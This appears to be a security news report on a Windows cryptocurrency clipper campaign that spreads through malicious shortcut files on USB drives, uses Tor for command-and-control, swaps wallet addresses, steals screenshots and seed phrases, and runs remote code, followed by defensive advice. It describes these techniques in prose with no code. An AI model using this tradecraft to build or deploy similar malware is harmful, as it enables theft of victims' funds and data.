Crypto Clipper Windows Attack Campaign
Security researchers have revealed details of a sophisticated Windows-based cryptocurrency clipper operation that has been active since February 2026. The campaign employs clipboard-monitoring malware capable of self-propagation and leverages the Tor anonymity network to conceal its communications infrastructure.
Unlike conventional malware operations that rely on standard installers or publicly exposed Command-and-Control (C2) servers, this threat deploys a portable Tor client and routes all traffic through a local SOCKS5 proxy. By combining cryptocurrency theft, data exfiltration, and remote code execution capabilities, the malware functions not only as a clipper but also as a lightweight backdoor.
Table of Contents
How the Clipper Malware Operates
Clipper malware is designed to silently monitor a victim's clipboard activity and intercept sensitive information copied into memory. Its primary objective is to manipulate cryptocurrency transactions by identifying wallet addresses associated with known blockchain formats and replacing them with attacker-controlled alternatives. As a result, funds intended for legitimate recipients can be redirected without the victim's knowledge.
This campaign relies on Windows Script Host and ActiveX-based functionality to launch an embedded Tor proxy and communicate with a hidden-service C2 server. The malware performs continuous clipboard surveillance, captures screenshots, steals cryptocurrency-related information, and substitutes wallet addresses in real time.
USB-Based Infection Chain and Worm Functionality
The attack begins with the distribution of malicious Windows Shortcut (LNK) files through removable USB storage devices. When a victim opens one of these shortcuts, a worm component is activated. The malware first determines whether the system has already been infected and downloads the remaining payload only if no prior infection is detected.
The LNK payload actively searches connected USB devices for commonly used document formats, including DOC, XLSX, and PDF files. Once discovered, these files are hidden and replaced with malicious shortcut files bearing identical names. This deceptive technique increases the likelihood that users will unknowingly execute the malware while attempting to open what appears to be a legitimate document.
Beyond the initial compromise, the worm is responsible for spreading the infection to additional uninfected USB devices. It also establishes persistence by creating scheduled tasks for both the worm and the stealer components.
Advanced Evasion and Persistent Command Execution
The clipper component utilizes WScript and ActiveXObject to interact directly with the operating system. To reduce the likelihood of detection, the malware checks active processes and terminates itself if Task Manager is running.
During the final stage of execution, a renamed Tor binary is launched in a hidden window. The malware then generates a unique victim identifier and registers it with its remote infrastructure. After registration, it enters a continuous operational loop, polling the C2 server for commands while monitoring clipboard contents approximately every 500 milliseconds.
In addition to harvesting cryptocurrency wallet data, seed phrases, and private keys, the malware captures screenshots and transfers them through the Tor network. If the C2 server responds with an EVAL command, attacker-supplied code is executed dynamically on the compromised system, significantly expanding the threat's capabilities.
Key Indicators and Defensive Recommendations
Security teams are advised to focus on behavioral detection techniques rather than relying solely on static malware signatures. Particular attention should be given to suspicious PowerShell-based screen-capture activity and unusual use of Windows scripting engines such as WScript or CScript to launch utilities including curl, cmd.exe, PowerShell, or other unexpected executables.
Recommended defensive measures include:
- Disabling AutoRun and AutoPlay functionality for all removable media, blocking LNK file execution from USB devices through Group Policy Objects (GPOs), and limiting unnecessary use of wscript.exe and cscript.exe.
- Monitoring systems that handle financial or cryptocurrency-related operations for abnormal clipboard activity, unauthorized screen-capture behavior, and suspicious Tor-related network communications.
Why This Threat Stands Out
This campaign demonstrates the increasing sophistication of financially motivated malware. By combining USB-based worm propagation, clipboard hijacking, Tor-obfuscated communications, screenshot exfiltration, and remote code execution into a single toolkit, the operators have created a versatile threat capable of both stealing cryptocurrency assets and maintaining long-term access to infected systems. The use of hidden-service infrastructure further complicates detection and takedown efforts, making proactive behavioral monitoring a critical defense strategy.
